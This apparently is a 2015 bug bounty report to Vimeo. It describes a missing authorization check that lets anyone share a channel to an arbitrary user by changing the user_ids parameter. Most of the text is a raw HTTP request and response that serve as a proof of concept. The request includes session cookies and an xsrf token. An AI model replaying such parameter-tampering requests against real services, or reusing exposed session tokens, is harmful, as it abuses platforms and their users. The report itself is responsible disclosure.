Share your channel to any user on vimeo without following him

Hi Team, Hope you are good. Privilege escalation vulnerability exist on the request of sharing your channel to user. You can share your channel to any user without even following him Request : POST /channels/893054 HTTP/1.0 Host: vimeo.com User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:36.0) Gecko/20100101 Firefox/36.0 Accept: text/javascript, text/html, application/xml, text/xml, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded; charset=utf-8 Referer: https://vimeo.com/channels/893054 Content-Length: 155 Cookie: vuid=1508464746.1333941254; __utma=18302654.119544349.1426737086.1426737086.1426737086.2; __utmc=18302654; __utmz=18302654.1426737086.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=18302654.|2=user_type=basic=1^3=ms=0=1^7=video_count=0=1^10=vuid=1508464746.1333941254=1; has_logged_in=1; stats_start_date=2015%2F03%2F15; stats_end_date=2015%2F03%2F19; __gads=ID=c9339811dfc88470:T=1426737131:S=ALNI_MZDCrEc2e-pl3FH439sQhwleaJtWQ; site_settings=%7B%22sticky_page%22%3A%22%5C%2Fmyvideos%22%2C%22browse_format_vid%22%3A%22video%22%7D; player=""; _abexps=%7B%2246%22%3A%22%22%7D; auto_load_stats=1; stream_id=Y2xpcHM6Mzg0NzcwMDM6aWQ6ZGVzYzpbXQ%3D%3D; stream_pos=1; __utmb=18302654.60.9.1426783441248; vimeo=epkmdrrssk70pcdx9rmxrtx7jpcdx9rmxrtx7%2Cpxux2vsdtxss0tf05kmcm5fv2fx9v0c5vkfkc5fm0; vimeo_player=eypkmdrrssk70pcdx9rmxrtx7jpcdx9rmxrtx7%2Cpcc9xcrfrv92stm0duwkvs9wrcmmv9scmvu2rdw9k; clips=9860371; __utmli=follow_btn; xsrft=2e1ac78a9327ebf091aea130bb17a855.d233e8fa090465217a917c2b74e7645e Connection: keep-alive Pragma: no-cache Cache-Control: no-cache action=send_message&user_ids=37857677&user_emails=&message=&token=2e1ac78a9327ebf091aea130bb17a855.d233e8fa090465217a917c2b74e7645e&collection_type=channel Vulnerable parameter : user_id . Just change the user ID and put any user ID .It will work. Privilege escalation is on this request which doesn't check where you are following the user(user_id) or not. Response : HTTP/1.0 200 OK Date: Thu, 19 Mar 2015 16:45:24 GMT Server: nginx Content-Type: text/html; charset=UTF-8 Expires: Thu, 19 Mar 2015 04:45:24 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff X-UA-Compatible: IE=edge X-Frame-Options: sameorigin Content-Security-Policy-Report-Only: default-src https: data: 'unsafe-inline' 'unsafe-eval'; report-uri /_csp Content-Length: 147 Accept-Ranges: bytes Via: 1.1 varnish X-Served-By: cache-lax1420-LAX X-Cache: MISS X-Cache-Hits: 0 X-Timer: S1426783524.491806,VS0,VE153 Vary: User-Agent,Accept-Encoding Set-Cookie: xsrft=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.vimeo.com Keep-Alive: timeout=10, max=50 Connection: Keep-Alive Kindly FIx this is ASAP. Thanks !